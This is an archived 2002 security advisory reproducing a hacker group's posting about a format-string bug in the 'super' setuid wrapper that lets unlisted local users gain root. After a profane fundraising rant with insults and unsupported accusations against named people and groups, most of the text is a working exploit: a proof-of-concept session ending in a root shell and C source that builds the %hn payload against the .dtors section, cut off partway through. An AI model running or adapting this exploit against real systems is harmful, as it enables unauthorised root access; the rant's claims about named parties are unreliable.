1st Aug 2002 [SBWID-5587]
COMMAND
super overflow via syslog
SYSTEMS AFFECTED
?
PROBLEM
GOBBLES says :
/*
* SAVE DEFCON..HELP GOBBLES..SAVE DEFCON..HELP GOBBLES
*
* When GOBBLES say he and he security team
* are non-profit. He really mean NON-profit.
* This means GOBBLES and he GOBBLES Security
* Labs (GSL) friends do not have much funds.
*
* GOBBLES was hoping to receive the money
* for speaking at the defcon gathering of
* security enthusiasts up front. So he could buy
* and pay for he ticket to Las Vegas from the great city
* of Baltimore where he currently resides.
*
* GOBBLES is not selling out. GOBBLES is just admitting that he
* need your help. Please, help GOBBLES!
*
* After many e-mails to defcon organisers it became
* apparent to GOBBLES this was not going to happen.
* This mean GOBBLES has no way of getting to defcon.
* This also mean GOBBLES cannot deliver he talk that
* are named "Wolves among us". Alot of time and work
* went into the preperation of this talk and it was
* to be the grand finale of the year of the turkey
* (2002). With many new 0-day to give out and many
* great anouncements to be made.
*
* Thanks to Jeff Moss (dt@defcon.org, jmoss@blackhat.com)
* you, the defcon attendee, may very well get cheated out
* of attending one of the most provocative and daring
* events defcon history has ever seen.
*
* !!! ITS NOT TOO LATE..BUT HURRY !!!
*
* Help GOBBLES go to defcon. GOBBLES give so much to
* the community..is it not time the community now help
* a poverty stricken turkey to spread his wings and fly
* towards fame and glory?
*
* Reasons why you should help GOBBLES get to defcon:
*
* -- Paying for GOBBLES plane ticket to Vegas is better than spending $300 on a stripper
*
* -- Seeing GOBBLES present naked: Priceless.
*
* -- Zeroday (possible hardcover) GOBBLES comic
*
* -- A chance to buy GOBBLES art
*
* -- A chance to receive _free_ GOBBLES T-shirts
*
* -- Copies of those exploits you couldn't code
*
*
* What does GOBBLES need?
*
* Basically GOBBLES need to round up 300 US dollars before saturday.
* "Wolves among us" is sheduled for the last day of defcon.
* Namely 3PM on Sunday August 4th. As you can very well imagine
* this talk was going to blow the lid off of more dirty secrets
* than there are noodles in China. With your help GOBBLES can still
* make this happen. So what GOBBLES is asking for is a little helping
* hand from the community. If anyone has the funds to sponsor GOBBLES
* to come to defcon please contact GOBBBLES at GOBBLES@hushmail.com.
*
* !!! TURKEY SUPPORTERS...DO NOT LET THE TURKEY BE SILENCED !!!
*
* GOBBLES accepts Western Union payments. GOBBLES will not accept anything
* beyond the amount needed for travel to Vegas and back. GOBBLES is not
* selling out, GOBBLES is asking help from those penetrators and researchers
* that GOBBLES helps every day.
*
* In other news, ISS rejected GOBBLES request for a job application. It
* seems that they're afraid of getting scalp'd.
*
* Political statement:
* HALT THE SNOSOFT ABUSE OF 14 YEAR OLDS. MAKING CHILDREN SLAVE OVER 3 LINE
* PERL EXPLOITS FOR LESS THAN MINIMUM WAGE IS NOT VERY ETHICAL !!!
*
* FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN
* JAIL W00W00 JAIL W00W00 JAIL W000W0 JAIL W00W00 JAIL W00W00 JAIL W00W00
* FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM
*/
/*
* GOBBLES-own-super.c
* -- root exploit for root hole in root wrapper
*
* Super is sudo wannabe that boasts much security.
* GOBBLES think people who write setuid wrappers
* should learn to program securely before opening
* big hoohoo about how secure program is.
*
* Current super version (3.18):
-- ftp://ftp.ucolick.org/pub/users/will/
*
* Super maintainer say following about he code:
*
* "Super allows an admin to control access to files
* and functions for users. It is similar to sudo, but
* uses a different approach in the configuration file."
*
* Problem:
*
* When super is compiled to use syslog(3) for its logging
* of error messages the following lines makes pre-auth
* local root exploitation rather trivial:
*
* From error.c
* ...
* #define SysLog(pri, buf) syslog((pri), (buf))
* ...
* SysLog(error_priority, buf);
* ...
*
* This means users that are not in the super config file
* will be able to execute code with root priviledges.
*
* "Super acts as a SetUID wrapper around system commands
* to make sure the commands are executed safely, and
* only by authorized users."
*
* hehehe ;PPpPPPPp
*
* Love,
* GOBBLES
* GOBBLES@hushmail.com
*
* Official site: http://www.bugtraq.org
* Official mirror: http://www.immunitysec.com/GOBBLES/
*/
/* Proof Of Concept:
$ gcc GOBBLES-own-super.c -o GOBBLES-own-super
$ ./GOBBLES-own-super
Usage:
./GOBBLES-own-super -t <.dtors address> [ -o <offset> -A <allignment> ]
$ objdump -s -j .dtors /usr/local/bin/super
/usr/local/bin/super: file format elf32-i386
Contents of section .dtors:
8063f7c ffffffff 00000000 ........
$ ./GOBBLES-own-super -t 0x8063f7c
. target @ 0x8063f80
. shellcode @ 0xbfffffb0
. username: 9 bytes
super: No such super command as `xx??%.49103x%29$hn%.16305x%30$hn'.
sh-2.05#
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <pwd.h>
#include <sys/types.h>
#define ALLIGN 2
#define DPA 29
#define SUPER "/usr/local/bin/super"
void buildstring(unsigned long t, unsigned long w, int dpa, int allign);
void stuff(void);
extern char **environ;
char string[256];
int
main(int argc, char **argv)
{
unsigned long t, w;
int dpa, allign, shift = 0;
char c, *store;
if(argc == 1) {
fprintf(stderr, "nUsage: n%s -t <.dtors address> [ -o <offset> -A <allignment> ]n", argv[0]);
exit(0);
}
allign = ALLIGN;
dpa = DPA;
while((c = getopt(argc, argv, "t:o:A:")) != EOF) {
switch(c) {
case 't':
sscanf(optarg, "%p", &store);
t = (long)store;
t += 4;
break;
case 'o':
dpa = atoi(optarg);
break;
case 'A':
allign = atoi(optarg);
break;
default:
fprintf(stderr, "hehehe ;PPppPPPpn");
exit(0);
}
}
store = NULL;
if((store = getenv("GOBBLES")) == NULL) {
stuff();
if(execve(argv[0], argv, environ)) {
fprintf(stderr, ". problem re-executingn");
exit(1);
}
}
w = (long)store;
// shift is signed so this works both ways
shift = (strlen(argv[0]) - strlen(SUPER));
w += shift;
fprintf(stderr, ". target @ %pn. shellcode @ %pn", t, w);
buildstring(t, w, dpa, allign);
if(execl(SUPER, "super", string, NULL)) {
fprintf(stderr, "error executingn");
exit(1);
}
}
void
buildstring(unsigned long t, unsigned long w, int dpa, int allign)
{
unsigned int un, deux, x, b[4], namelen;
char a_buf[4];
struct passwd *pass;
memset(string, '
SOLUTION
Update (2 August 2002)
======
William Deich says the patched version is available at
ftp://ftp.ucolick.org/pub/users/will/super-3.19.0.tar.gz
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
